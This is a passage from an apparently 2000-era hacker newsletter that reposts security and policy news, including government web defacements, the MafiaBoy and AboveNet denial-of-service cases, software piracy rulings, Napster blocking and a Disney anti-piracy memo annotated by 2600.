~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by at033
HV2k aka High Voltage 2000 appears to have been raided in relation to
several Canadian and US government defacements. SLiPY was raided in
late January by DND, NIS and the RCMP. The next day eg0death (Bleeding
Angel) was arrested by the US authorities in Texas. The current status
of eg0death, who was also in Global Hell, and SliPY are unclear at
this time. Someone calling themselves HV2k defaced the web server of
the US DHHS last Friday evening with a message "HV2k won't die". HV2K
is credited with defacing the same server on 11/2/99.
Ottawa Citizen - This article gives almost no information
Attrition.org - List of Over 50 Defacements Attributed to HV2k
http://www.ottawacitizen.com/hightech/000327/3825256.html
http://www.attrition.org/mirror/attrition/hV2ka.html
Cyber-mischief shows potential for damaging future attacks Online
terrorists, criminals likely to target vital infrastructure systems David
Pugliese The Ottawa Citizen
His alias is hV2k and he's a hacker who specializes in breaking into
military and government computers.
HV2k is the Internet name of the person who entered the Department of
National Defence's Web page on Nov. 1. Within a period of five days, hV2k
-- also known as "slipy" -- broke into 19 military and government
computers in Canada and the United States. On his list were the state of
Virginia's Sex Offender Registry, the state of New York's tax computer
system, the Canadian government's Human Resources Development Department,
and four U.S. military computer sites.
A joint Canadian Forces National Investigation Service and RCMP
investigation determined the identity of two people involved in the hV2k
attacks, one of them being a young offender, but no further details are
being released.
But one thing is certain: The Canadian military expects hackers similar to
hV2k to come calling again.
"Canada is becoming more and more of a target for hacker-cracker groups as
information regarding domestic vulnerabilities becomes known," a Canadian
military intelligence report written in November concludes. Expect more
intrusions, was the report's basic message.
HV2k simply left his name on the military's Web site, but that action
required the department to individually check all its pages on the
Internet to see whether they had been altered. It's not known what was
done to the U.S. sites.
But security analysts and government officials are concerned there is
potential for much more than Web vandalism, especially when compu-ters are
put into the hands of terrorists and criminals. A concentrated attack,
they worry, could shut down the key infrastructure computers that run
everything from the hydro system to telecommunications.
The result could be similar to the damage caused by the massive ice storm
that paralysed much of Eastern Canada in 1998.
"To me, it's the threat of the future which has to be watched more
closely," says Conservative Senator William Kelly, the chairman of the
Senate committee on terrorism and public safety. "A cyber-attack is a much
cheaper way to interfere with critical infrastructures than it is to drop
a nuclear bomb."
The other problem Canada faces is its close links with the U.S., both in
economic areas and its computer infrastructure. Any attack on the U.S. is
bound to cause a ripple effect into Canada.
"The U.S. has the highest level of technology, and therefore is the most
vulnerable to (information operations) attack by state (or) non-state
actors," warns another intelligence report compiled in November. "Canada's
connectivity with the U.S. also makes it highly vulnerable to (information
operations) attacks."
But terrorism expert John Thompson of the Mackenzie Institute in Toronto
sees the threat as overblown, at least for now. He says those who are
"attacking" government and military systems have been mainly hackers not
related to terrorist groups.
"No one has seen a terrorist yet who can do anything beyond hacking a Web
page up," Mr. Thompson points out. "It's more of a threat in potential
than one that has been realized."
The main problem for terrorist groups, he argues, is in finding competent
hackers. "Where is (Osama) bin Laden going to get his hackers?" asks Mr.
Thompson, referring to the alleged terrorist leader who is believed to
have ordered bombing attacks against U.S. embassies in Africa. "In
Afghanistan? I don't think so."
Mr. Kelly acknowledges that many attacks on Canadian computer systems can
be classified as more a nuisance than a threat. But he also points out
that some of the attacks, while appearing to be minor in nature, are
actually probes to test the weaknesses of the systems. That could be a
lead-up to more devastating assaults in the future.
In other cases, information has been removed or altered. For example,
Immigration Canada's computers have been hacked into by someone opera-ting
from Asia and certain records were removed. "I consider that highly
dangerous," says Mr. Kelly.
Specialists in information warfare vary in their estimation of how
prepared Canada is for a cyber-attack. Col. Randy Alward, commander of the
Canadian Forces Information Operations Group, said the military itself has
a secure internal computer system. It also has a specialized team that
continually tests the security of its systems.
The Armed Forces is also developing a robust information protection
capability because it wants to branch out more on the Internet, using it
for everything from gathering information on military equipment purchases
to booking travel for employees. But to do that it has to make sure that
any future Internet connections are secure, so intruders can't use them to
slip into the internal computer system.
"We believe we are developing an information protection capability that is
fairly good," said Col. Alward. "We're quite comfortable with it, but it
is developing."
Other specialists, such as Prakash Bhartia, director general of Defence
Research Establishment Ottawa, where advanced work is being conducted into
hacker threats, worry that other federal government and commercial
computers are open to attack. "We are pretty vulnerable," acknowledges Mr.
Bhartia. So far, he said, Canada has escaped any real dama-ging attack.
His concern is borne out by intelligence reports. "The vulnerabilities of
Canadian critical infrastructure are increasing and recent trends show
more attacks aimed at infrastructures," the November report warns.
But Mr. Kelly believes the country is on the right track in preparing for
future cyber attacks. He says a lot of progress has been made in both
provincial and federal government areas in setting up a system to share
information on attacks and determining where the vulnerabilities lie. He
believes Canada is ahead of the U.S. in the area of protecting its
infrastructure computers and that a national centre to co-ordinate a
response to cyber attacks will soon be developed by the government.
"One of the problems we've had all along is the relative lack of concern
Canadians have always had about their own security," said Mr. Kelly. "But
I think people are gradually becoming more aware of what the risks are."
Those risks, according to the Canadian military intelligence reports,
could come in the form of hackers for hire, both for criminal and
terrorist groups. "Many hackers or crackers, including former employees of
Eastern Bloc intelligence services, now work on the open market and
provide their services to state/non-state actors," one report determined.
"Clients include business intelligence firms engaged in industrial
espionage as well as criminal organizations intent on outwitting police
surveillance or perpetrating electronic frauds."
It points out that the Colombian drug cartel, for instance, has set up a
communications system that is difficult for police and western
intelligence agencies to break into.
Other groups are operating for more political motives. One such
organization, the Hong Kong Blondes, claims to be based in China and is
directed by two individuals by the names of Blondie Wong and Lemon LI. An
offshoot of that group has been created and dubbed the Yellow Pages. It
has threatened to attack the information infrastructure systems in China
and the U.S., with the goal of increasing international awareness of human
rights abuses in China.
"It seems (the Hong Kong Blondes) was created to demand accountability
from western companies that conduct business with (Chinese) organizations
who are responsible for the continuing abuses of human rights," one
intelligence report noted. The Hong Kong Blondes, it pointed out, are
ready to conduct computer attacks on western companies dealing with China.
@HWA
99.0 [HNN] Piracy Legal In Italy, Sort of
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by TheHex
A judge in Turin has ruled that the copying of commercial software is
not a crime as long as it is not done for profit or sold to third
parties. The case centered around a Turin businessman who made copies
of software for use in his company. The judge ruled that since the
business man did not copy the software for profit he is not guilty of
a criminal violation. Microsoft said it was disgusted with the ruling.
Wired
http://www.wired.com/news/politics/0,1283,35827,00.html
Italy: Software Piracy OK, Sorta Reuters 8:00 a.m. Apr. 21, 2000 PDT
MILAN -- A judge in Turin has ruled that it is not a crime to copy
software as long as it is not done for profit and the pirated copies are
not sold to third parties, Italian newspapers reported on Friday.
Corriere della Sera and other papers reported the case of a Turin
businessman who made copies of word-processing, accounting, and design
software for use in his company.
But even though he saved money by paying only one license fee, the judge
ruled that since he had not sold on the copied software to others, he did
not act "for profit."
Defense lawyer Claudio Morro told Corriere that the ruling was in line
with the law, which specifically said that for criminal rather than civil
charges to be brought, the motive for copying the software had to be
profit.
"My client copied the programs not to sell them to others but only to use
them within his company. So in his case there is only the saving on
spending," Morro was quoted as saying.
"There could still be elements for a civil case, but from a criminal point
of view the question is resolved."
A Microsoft Italia executive told the paper the company was disgusted by
the ruling.
"It is clearly the fault of a legislative hole, but also of an excessively
technical attitude on the part of the judge who passed the sentence. The
judge has made a mistake," Maurizio Bendina, director of Microsoft
Italia's small business division, was quoted as saying.
Copyright � 1999-2000 Reuters Limited.
@HWA
100.0 [HNN] Palm VII Considered Security Threat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by William Knowles
The Lawrence Livermore National Laboratory has banned the Palm VII
from its labs due to its potential as a security threat. Lab officials
say that they are complying with DOE directives that prohibit devices
that can transmit information over radio waves. Officials are afraid
that saboteurs may use the PalmVII to transmit classified information
outside the lab perimeter.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/merc/docs/001887.htm
Deceased url
@HWA
101.0 [HNN] Navy Intranet National Security Risk?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by William Knowles
The American Federation of Government Employees (AFGE) has charged
that the Navy's proposed $10 billion, 360,000 seat intranet is threat
to national security. AFGE says that the Navy has not thoroughly
thought out its plan and that awarding the entire contract to one
company places a considerable security risk on the proposed Intranet.
The Navy claims that the AFGE simply does not understand the
complexity of the situation.
Wired
http://www.wired.com/news/politics/0,1283,35713,00.html
Navy Intranet a Security Threat? by Craig Bicknell 3:00 a.m. Apr. 21, 2000
PDT The U.S. Navy's plan to build the world's biggest Intranet could
create a big security threat and a boondoggle to boot, according to the
country's largest federal employees union.
"We're concerned about national security, because the Navy's not able to
answer basic questions about how they will protect national security on
(the new Intranet), and we're concerned that they're playing a shell game
with money," said Brendan Danaher, policy analyst for the 600,000
member-plus American Federation of Government Employees (AFGE).
The union's barrage is the latest attack on the Navy's proposal to build a
gargantuan, 360,000-seat Intranet that would unify all of the Navy and
Marine Corp's shore-based operations. The Navy plans to award the $10
billion contract for the project to one of four corporate bidders this
June -- nine months earlier than originally planned -- reflecting the
sea-service's urgency to reap the benefits of modern info-tech.
Last month, the United States General Accounting Office testified before
Congress that the Navy had rushed the proposal to corporate bidders
without properly analyzing how it would be funded and managed, and what
effect it would have on military and civilian information technology
workers.
Since then, embattled Navy representatives have appeared before Congress
53 times to defend their plan.
"There's been absolutely no one who questions the need, value, or concept
of this Intranet," Navy deputy CIO Ron Turner said. "They just don't
understand the math we've put into this."
But there's more than a math problem, insists AFGE's Danaher. The Navy's
plan to contract out the installation, service, and oversight of the
Intranet to a single private company poses an unacceptable national
security risk, he said.
"We're concerned that private companies will put their interest before
national security," Danaher said. "What if that company's ownership
changes, or its stock price plummets. Who knows what could happen?"
That argument lacks a certain sophistication, according to Turner.
"It's a comment made without looking at how we currently operate. The
government would like you to believe that we control the networks, but we
ride on commercial fiber that someone else operates," he said.
Moreover, the Navy currently operates 100-plus separate networks, all with
different firewalls and security, all of which have to interconnect. That
means 100 points of vulnerability, according to Turner. With a unified
Intranet, the Navy can deploy one security system and screw it down tight.
Security will be improved, not degraded, he insists. There's no
budget problem either, Turner said. Funds for the Intranet will come from
money already allocated for IT projects, not from the operational coffers
that pay for ships to sail and planes to fly, as critics in Congress have
charged.
Turner attributes the AFGE's attack largely to a self-serving desire to
protect union IT jobs that might be threatened by the new Intranet. Some
1,000 civilian IT employees could be displaced by the Intranet, he said,
but the Navy will take pains to place them in new positions.
Danaher counters that it's not the threat of job losses that concerns the
AFGE so much as the Navy's inability to say exactly what jobs might be
lost where, and what that says about the broader project. "We don't know,
the Navy doesn't know, nobody knows, and that's a symptom of a larger
problem," Danaher said.
"Our members are people that work for the military and the federal
government, and they're concerned about national security and efficiency,"
he said. "When you look at the history, you see that the Navy is anything
but trustworthy when it comes to contract oversight. We're not saying this
is a horrible idea, but the way they're going about this is pretty
dangerous."
The government's accounting office and a number of congressmen share those
concerns.
"Look, we're not trying to pull the wool over people's eyes," said a weary
Turner, who expects to appear before Congress several times in the coming
weeks to further detail the Navy's proposal.
Meanwhile, barring any direct orders to the contrary, the project will
continue full-speed ahead.
"Nobody's told us to stop or slow down," Turner said.
@HWA
102.0 [HNN] Mitnick Upset Over Claims Made by UITA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by Mitnick_Media
In a press release linked to by HNN last Thursday the Utah Information
Technology Group made several claims that Kevin Mitnick feels are in
error. In an effort to set the record straight we provide both sides
of the story.
HNN Archive for April 2, 2000
Desert News
Mitnick Rebuttal
http://www.hackernews.com/arch.html?042000#2
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Already printed elsewhere this issue - Ed
@HWA
103.0 [HNN] Holiday Message from Disney Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by Macki
2600 magazine was recently furnished with a copy of an email sent from
Walt Disney CEO, Michael Eisner, to a vast number of Disney employees
about DVD piracy.
2600
http://www.2600.com/news/2000/0423.html
A HOLIDAY MESSAGE FROM DISNEY CHIEF 04/23/00
2600 was recently furnished with a copy of an email sent from Walt Disney
CEO, Michael Eisner, to a vast number of Disney employees. While 2600 is
not mentioned by name, the letter clearly focuses on the issues raised by
the lawsuit Disney (and other MPAA members) have filed against us for
publishing DeCSS on our website. In one paragraph towards the end of the
letter Eisner actually makes our case for us and admits that either DVDs
are too expensive and people pirate them, or they are affordable (which
they are) and people don't pirate them (which they don't).
Our comments are in bold.
Dear Fellow Cast Members:
In several past e-mails, I have written you about the tremendous
opportunities represented by the Internet. Today, I offer a caveat. While
the Internet continues to be present great potential to our company, we
first must fully address the issue of piracy.
For some reason piracy has been on my mind. Maybe this is because I keep
reading about the seriousness of it, or maybe it is because I know a
digital copy of a film is a perfect copy. Or maybe it is because I know
that the Internet is a worldwide delivery system honoring no borders. Or
maybe it is because I just needed something to speak about at the
Variety/Schroeder's entertainment industry conference in New York City 10
days ago. Probably it is a little of all the above.
[A digital copy transferred over the Internet is likely to be compressed
and far poorer quality than an analog copy.]
By "piracy," I'm not talking about the comical characters sailing the high
seas at the Pirates of the Caribbean. Rather, I'm talking about an
underground of secretive and sequestered pirates of encryption - the
hackers who shamelessly assert that anything they can get their hands on
is legally theirs. These Internet pirates try to hide behind some
contrived New Age arguments of the Internet, but all they are really doing
is trying to make a case for Age Old thievery.
[Wow that's pretty twisted. "pirates of encryption", who the hell are
they? How does one pirate encryption? More so, what does that possibly
have to do with people stealing? On top of all that, now 'hackers' is
supposed to be synonymous with 'shameless thieving pirates of encryption'?
Someone here is shameless, and it ain't us. "When they hack a DVD and then
distribute it on the web", yet another jump is made from breaking
encryption to PLAY DVDs to distributing it on the web. Funny how they
haven't accused ANYONE of doing this. Nor would it make any sense for
someone to "hack a DVD" before ripping it as a VCD - since VCDs are
usually lower resolution than television.]
When they hack a DVD and then distribute it on the web, it is no different
than if someone puts a quarter in a newspaper machine and then takes out
all the papers, which, of course, would be illegal and morally wrong. The
pirates will argue that this analogy is unfair, maintaining that all
they're doing is cracking a digital code. But, by that standard, it would
be justifiable to crack a bank code and transfer the funds from someone
else's account into your own. There's just no way around it - theft is
theft, whether it is enabled by a handgun or a computer keyboard.
[Of course pirates will argue that analogy is unfair - so would anyone
with any modicum of critical thinking skills. While we could argue the
difference between intellectual property and tangibles like a newspaper,
this analogy is irrelevant because no piracy is actually taking place.
Normally we wouldn't even feel the need to respond to this, but since he
goes on to imply that WE are the "pirates" it seems like a good idea.
Eisner speculates that people will maintain that all that was done was the
"breaking of the digital code" - he's right. Note that breaking CSS does
not involve any stealing or piracy. So then it does not logically follow
that by breaking the code someone is also necessarily using it to steal.
After all, CSS prevents DVDs from being PLAYED not COPIED, so cracking it
is in no way an indication of impending theft.]
Of course, piracy has been around a long time. Many of you probably
remember a very funny "Seinfeld" episode (I suppose that's redundant -
they all were funny, except maybe for the last one) in which Jerry becomes
an "auteur" at making illegal copies of movies by videotaping them off the
screen at the local multiplex. But, piracy is anything but funny ...
especially now that, instead of making one bad quality videotape for sale
on the street, these digital pirates could soon be making unlimited
numbers of high quality copies available on the Internet.
One of the fallacies of the piracy debate is that it's really just a
conflict of the pro-technology members of the "New Media" against the
anti-technology members of the "Old Media." This characterization couldn't
be more wrong. At Disney we embrace technology. And we always have.
Throughout his career, Walt Disney recognized new technology as the friend
of the storyteller. And, at Disney today, we are not only seizing the
tremendous possibilities offered by technology in movies, as with
"Dinosaur" and "Toy Story," but we are also active participants in the
expansion of the Internet with our GO.com family of sites. We intend to
continue to devote resources to the Internet ... but not if this requires
surrendering the rights to things we own. With this in mind, our company
is undertaking a wide-ranging strategy to make the Internet truly safe for
intellectual property. This strategy consists of five main elements.
First of all, we are turning to our representatives in Washington.
Intellectual property rights are really no different from ordinary
property rights. If you own something, you expect the government to
respect your right to keep it from being stolen.
[Ah good, since legislating security away worked so well the first time!]
Secondly, we are working with governments around the world to respect our
rights. We are actively involved in the Global Business Dialogue on
Electronic Commerce, and our company is serving as chair of the
Intellectual Property Work Group.
The third element is education. Working with The Motion Picture
Association of America, we are advocating a more aggressive campaign to
make people aware of intellectual property rights on the Internet. Most
people are honest and want to do the right thing. But they can't do the
right thing if they don't know that they're doing a wrong thing.
[Perhaps they should consider gaining a tighter grasp on reality
themselves, before being so presumptuous as to educate others on the
Internet.]
Fourth, we believe that the entertainment industry as a whole should take
meaningful technological measures. Working in cooperation with technology
companies, we need to develop innovative and flexible encryption devices
that can stay one step ahead of the hackers.
[How about just doing it right the first time? Or better yet, stop
infringing on the Fair Use Doctrine, so that people won't NEED to break
the encryption!]
Our fifth initiative is economic. History has shown that one of the best
deterrents to pirated product is providing legitimate product at
appropriate prices. In the music industry, we have already seen that
people will gladly pay fair prices for legally-produced product even when
it can be easily reproduced and unlawful copies can be easily acquired.
[This is the best paragraph in the whole damn thing. Michael Eisner is
actually admitting that either DVD prices are too high (like in the UK) or
that piracy is not a problem because people will buy DVDs anyway - just
like they do CDs. He is absolutely correct, we have been saying this all
along. It is cheaper to BUY a DVD than it is to pirate it, and you get a
nice clean copy complete with goodies. Finally, the truth comes out:
PIRACY IS NOT THE ISSUE! Being able to PLAY legally purchased DVDs in the
player and country of your choice are the issues! We're so glad Michael
Eisner has finally admitted this - maybe now Disney will drop the
lawsuit.]
With every passing day, I believe we are getting closer to a time when the
Internet will become another important revenue stream for the studios.
This is what happened with Pay TV in the '70s and with Home Video in the
'80s. If we act appropriately and aggressively in combating the pirates,
then this could be the dawn of a new era of opportunity for companies that
consistently create great entertainment ... and there's one in particular
that comes to mind.
So that's what has been on my mind the last couple of weeks, that as well
as the strong showing of our company, especially at our parks and TV
networks. Life is good. Have a nice Easter/Passover Weekend.
[Lashanah haba'ah b'Federal Court, Mikey]
Michael
@HWA
104.0 [HNN] Attrition Updates Mailing List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 24th
contributed by McIntyre
Attrition.org has modified their mailing list section to let readers
know that even though the main mirror isn't updated on a continual
basis, their automated mirror script e-mails the "defaced" lists by
default immediately after each mirror is taken along with a URL for
the mirror's location. Readers interested in more "instant
notification" should sign up today.
Attrition.org
http://www.attrition.org/security/lists.html
@HWA
105.0 [HNN] MafiaBoy's Friends Under Investigation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Evil Wench
Authorities have identified three friends of MafiaBoy who are also
suspects in the recent DDoS attacks. Authorities are also
investigating a small group thought to be based in Isreal who have
been involved in various online financial crimes in the past. They
said they are also still looking at Coolio (Dennis Moran) as a
possible suspect.
USA Today
http://www.usatoday.com/life/cyber/tech/cth767.htm
06/07/00- Updated 07:49 PM ET
Hacker's friends may be suspects, too By Kevin Johnson, USA TODAY
WASHINGTON - Authorities investigating the February attacks on some of the
most popular Internet sites are focusing on three close friends of the
15-year-old Canadian boy who was charged earlier this week, a senior U.S.
law enforcement official said Thursday.
The three friends of the Montreal computer hacker known as "Mafiaboy" are
among several potential suspects identified by authorities in the
cyberassaults that temporarily shut down the Web sites of CNN, Yahoo!,
Amazon.com and several other media and commercial giants.
Beyond Montreal, authorities are examining the activities of a small group
of hackers thought to be based in Israel. Officials there say the group
has been involved in various online financial crimes, some involving
stolen credit card numbers.
The group is believed to be part of a larger circle of computer users,
including Mafiaboy, who have spent time in an Internet chat room called
TNT. The chat room is accessible only by password.
Investigators also are trying to determine whether Dennis Moran, a
17-year-old New Hampshire hacker known online as "Coolio," was involved in
the attacks in February.
Moran, who authorities say has boasted of being involved in the attacks,
was charged last month in an attack on a Web site run by the Los Angeles
Police Department.
The unidentified Montreal teenager known as Mafiaboy has been charged only
in two attacks against CNN.com, which was shut down for 3 1/2 hours Feb. 8
after it was overloaded with requests.
Mafiaboy claimed credit in chat rooms for similar assaults on sites run by
Yahoo! and Buy.com. Officials believe Mafiaboy may have been capable of
directing all the assaults but doubt that he did.
Analysts familiar with the assaults say the software used to wall off
access to the CNN Web site on Feb. 8 was different and less sophisticated
than that used to paralyze Yahoo! on Feb. 7.
Michael Lyle, who runs a software security firm in Palo Alto, Calif., said
the attack on CNN involved software commonly found on Internet sites for
hackers.
"I literally could show you how to do it in three or four hours," he said.
The goal is to flood Internet sites with tens of thousands of requests,
disguising the source of the assault by routing the requests through
high-capacity computers elsewhere. The tactic overloads the targeted Web
sites, causing electronic paralysis.
Investigators say Mafiaboy orchestrated the attack on CNN.com through
computers at the University of California-Santa Barbara.
A Canadian law enforcement official said that because of Mafiaboy's age,
it is unlikely he would be sent to an adult prison if convicted of
"mischief to data."
If prosecuted and convicted as an adult, the teenager could face up to 20
years in prison. But in Canada's juvenile system, he faces a maximum of
two years in a youth detention center if convicted.
Contributing: Deborah Solomon
@HWA
106.0 [HNN] Backdoor Found in Redhat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Mr. Big23
Earlier this month Internet Security Systems found a backdoor in
RedHat Linux, the problem has been labeled a 'flaw' by RedHat. The
company has been contacted and a fixed has been issued. RedHat
recommends that all users of the most recent distribution who have
installed Piranha download and install this patch.
MSNBC
RedHat Updates
http://www.msnbc.com/news/399125.asp?0m
@HWA
107.0 [HNN] USC Stands Their Ground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by TheHex
The University of Southern California (USC) has reportedly refused to
join other universities in blocking MP3 music downloads via Napster.
The university made the announcement on Friday in response to a
lawsuit filed by Metallica, which named USC, Yale University and
Indiana University as defendants in charges alleging the schools
allowed students to pirate copyrighted music. The lawsuit has caused
both Yale and Indiana U. to implement filters on their networks to
prevent Napster use. (Go Trojans!)
NewsBytes
Indiana University - Just look at the Spin
http://www.technews.com/pubNews/00/147722.html
http://www.iuinfo.indiana.edu/ocm/releases/napster02.html
IU installs filters preventing use of MP3 music site
April 20, 2000
BLOOMINGTON, Ind. -- Indiana University announced today that it will block
all IU network traffic related to a popular MP3 music Web site called
Napster.com.
"In the rapidly evolving technology related to the Internet, copyright
issues in cyberspace remain unclear," said Christopher Simpson, IU vice
president for public affairs and government relations. "We believe Indiana
University has no liability by allowing access to sites such as Napster.
We now believe, however, that our faculty, staff and students could incur
legal exposure if they use this technology. Until those unresolved legal
issues are clarified, it seems prudent to block the site."
Heavy metal band Metallica, E/M Ventures and Creeping Death Music filed a
lawsuit last week against Napster, IU and two other colleges contending
copyright infringement. While IU does not believe it has any liability to
the plaintiffs, the lawsuit prompted a closer look at access issues.
"This issue has received a significant amount of attention in recent
days," Simpson said. "It has caused us to focus on the fact that
technology has leaped well ahead of clear legal issues. University policy
prohibits violation of copyright laws, and we believe strongly in
protecting intellectual property. Those are fundamental tenets that we
will not abandon."
Simpson said he hopes a long-term solution can be found to ensure
individuals can have access to digital music while protecting intellectual
property rights.
(Christopher Simpson, 812-855-0850, csimpson@indiana.edu)
@HWA
108.0 [HNN] Critics Chide COPPA - Disney Plan Criticized
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by root66
The Children's Online Privacy Protection Act (COPPA) is being
criticized by web site administrators as being to costly to implement
and for encouraging kids to lie about their ages. Disney has said it
plans to ask for parents credit card numbers when verifying parental
consent. Mastercard has issued a statement saying that credit cards
are not meant to be used for age verification. Disney has said they
will go ahead with their plan.
Computer World
Children's Online Privacy Protection Act (COPPA)
http://www.computerworld.com/home/print.nsf/all/000424D89E
http://www.ftc.gov/ogc/coppa1.htm
@HWA
109.0 [HNN] Happy CIH Virus Day
~~~~~~~~~~~~~~~~~~~~~~~~~
April 25th
contributed by Bjornar
Last year the CIH virus struck rather hard around the world (or was it
just the media hype?). April 26th will be here tomorrow, do you have
the latest virus definitions installed? CIH or Chernobyl will attempt
to overwrite sectors on the hard drive and also attempt overwrite BIOS
on flash-capable systems.
NAI Virus Description
http://vil.nai.com/villib/dispVirus.asp?virus_k
Dead url
@HWA
110.0 [HNN] AboveNet Hit with DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by Evil Wench
AboveNet Communications has said that it received what it called a
'direct attack' on its infrastructure. Traffic at AboveNet was brought
to a standstill for four hours late Tuesday morning. AboveNet has
referred the matter to the FBI but says that tracking the attacker
should be easier than previous attacks.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2555422,00.html
FBI investigating new Web attack
ISP AboveNet hit by a denial-of-service attack -- blocking customers' Web
access for hours. 'It was a direct attack on our infrastructure.'
By Robert Lemos, ZDNet News UPDATED April 26, 2000 8:18 AM PT
Top-five Internet service provider AboveNet Communications suffered a
denial-of-service attack on Tuesday -- raising the specter of another
round of Web attacks. Paul Vixie, senior vice president of Internet
services for Metromedia Fiber Network Inc., AboveNet's parent company,
said the attack did not resemble February's spate of DoS attacks.
"This was not just a SMURF attack or some other broadcast storm aiming
meaningless data at our routers," Vixie said. "It was a direct attack on
our infrastructure."
The attack stopped Internet traffic to AboveNet's customers for several
hours starting late Tuesday morning.
The White Plains, N.Y., company is working with the FBI to investigate the
attack and declined to give more-specific details. Vixie did say that
tracking the attacker should not be as difficult as February's DoS attacks
had been. "Technically, there is cause for hope, where in the (denial of
service) case their was no cause for hope," he said.
Last week, a 15-year-old Canadian boy who called himself "Mafiaboy" online
was arrested by the Royal Canadian Mounted Police and charged in
connection with the denial-of-service attack on CNN's online site in
February.
The teen, whose name was not released due to his age, was arrested April
15 and formally charged two days later with two counts of mischief to data
after police searched his home. No suspects have been named in the attacks
on at least seven other sites, however.
AboveNet attack more skilled This attacker seemed a bit more skilled
than the cybervandals who flooded eight major Web sites in February, Vixie
said. "I would bet that this was someone with a little more experience
than the last batch."
AboveNet provides Internet service of and hosts the Web sites of nearly
1,000 companies, with offices in the United Kingdom, Germany, the
Netherlands and Japan.
Vixie said Tuesday's attack could not succeed again. "We plugged the hole
that has allowed it to happen," he said.
@HWA
111.0 [HNN] Thailand Has No Software Industry Due To Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root
The Business Software Alliance has blamed Thailand's 82% piracy rate
with preventing the development of a local software industry. The Thai
Software Industry Association said that it expects 30% growth in the
local software industry to 7 billion baht ($447.4 million) in 2000
despite the piracy rate.
Reuters
http://dailynews.yahoo.com/h/nm/20000425/tc/thailand_piracy_1.html
Dead Url (Yahoo blows for this) - Ed
@HWA
112.0 [HNN] War Plans Found on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by Evil Wench
The Web Risk Assessment Team, a reserve component unit designed to
score public web sites for classified information has found quite a
lot. 1,300 'discrepancies' where found on over 800 DOD web sites
including highly classified information. Pentagon war plans where also
discovered on at least ten separate occasions.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0424/web-jtfcnd-04-26-00.asp
DOD Web-watchers find war plans online BY Dan Verton RELATED STORIES
"DOD pushing forward on Internet disconnect" [FCW.com, April 26, 2000]
"DOD boosts IT security role" [Federal Computer Week, Oct. 4, 1999]
04/26/2000 A new reserve unit that monitors the Defense Department�s
presence on the World Wide Web has found an astonishing amount of
classified or sensitive material on public sites.
The Web Risk Assessment Team, established by the Joint Task Force for
Computer Network Defense, is made up of reservists who spend one weekend
each month scanning DOD Web sites, according to Air Force Maj. Gen. John
Campbell, commander of JTF-CND.
A survey of 800 major DOD sites on the Internet recently revealed as many
as 1,300 "discrepancies," some of them involving highly classified
information, Campbell said. The team uncovered more than 10 instances
where information on Pentagon war plans was posted.
Also among the discoveries has been information on computer system
vulnerabilities and more than 20 detailed maps of DOD facilities.
Some of the maps and photographs included detailed plans of a facility
known as "Site R," which serves as the alternate Joint Communications
Center for U.S. nuclear forces, according to Campbell. The overhead photo
of "Site R" showed the location of underground tunnel entryways and a
detailed floor plan of the facility.
Likewise, the Web site for an annual exercise known as "Cobra Gold"
included an entire list of participating units, communications frequencies
and call signs for aircraft and data on Identification Friend or Foe
squawks, which are signals used by pilots to determine if a plane is
friendly or enemy.
In another instance, the team found a classified excerpt in a policy
document on counterterrorism.
@HWA
113.0 [HNN] India May get New Cyber Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 26th
contributed by root66
A federal information technology bill has been proposed in India and
is set to be voted on next month. The proposed law will create a
Cyber-Regulations Advisory Committee, a controller, and adjudicating
officers to regulate cyber laws. There will also be a
Cyber-Regulations Appellate Tribunal.
http://www.wired.com/news/culture/0,1284,35822,00.html
India Eyes Cyberlaws by Frederick Noronha 3:00 a.m. Apr. 25, 2000 PDT
BANGALORE, India �- With estimates that nearly 2 million Indian citizens
will be online by 2001, the world's second-most populous country is
looking at ways to regulate cyberspace.
India is proposing a federal information technology bill to be voted on
next month. One of India's premier law schools, based here, has plans to
set up a national institute for cyber-legal studies and research.
The institute plans to research the problem of shifting business and trade
to the cyber-media, and blending national and international standards. It
is looking to sell the project to top Indian info-tech firms like Infosys
and Wipro through collaboration with policy planners in the Indian
government.
"We have made our blueprint, and plan to shortly approach friends in the
info-tech sector," said Dr. Nripen L. Mitra, director of the National Law
School of India University.
Bangalore, known as India's Silicon Valley, is a booming center for
software and dot-com companies. By the late 1990s, the city's software
exports comprised nearly 57 percent of India's total exports. The city has
an estimated 230 info-tech companies, employing nearly 25,000
professionals.
Mitra said rapid growth is in need of swift responses.
"Law behaves like a traditional Hindu wife, staying seven steps behind the
husband," he said.
The new high-tech economy also means Indian businessmen have to shift to
the paperless world after adapting to doing business in a very
bureaucratic country.
"Until recently, there were no cyberlaws in India," said Na Vijayashankar,
the author of a new book that explains the new laws that may take shape to
control, regulate, and harness cyberspace for Indian e-commerce.
The federal government recently brought forward the Information Technology
Bill. Under the proposed law, which is expected to be tabled in New
Delhi's Parliament in May, India will have a Cyber-Regulations Advisory
Committee, a controller, and adjudicating officers to regulate cyberlaws.
There will also be a Cyber-Regulations Appellate Tribunal.
The proposed law defines what constitutes a cybercrime, and also has
provisions to punish cyber-criminals. It sets up a framework for
transactions involving computer-generated documents and communication.
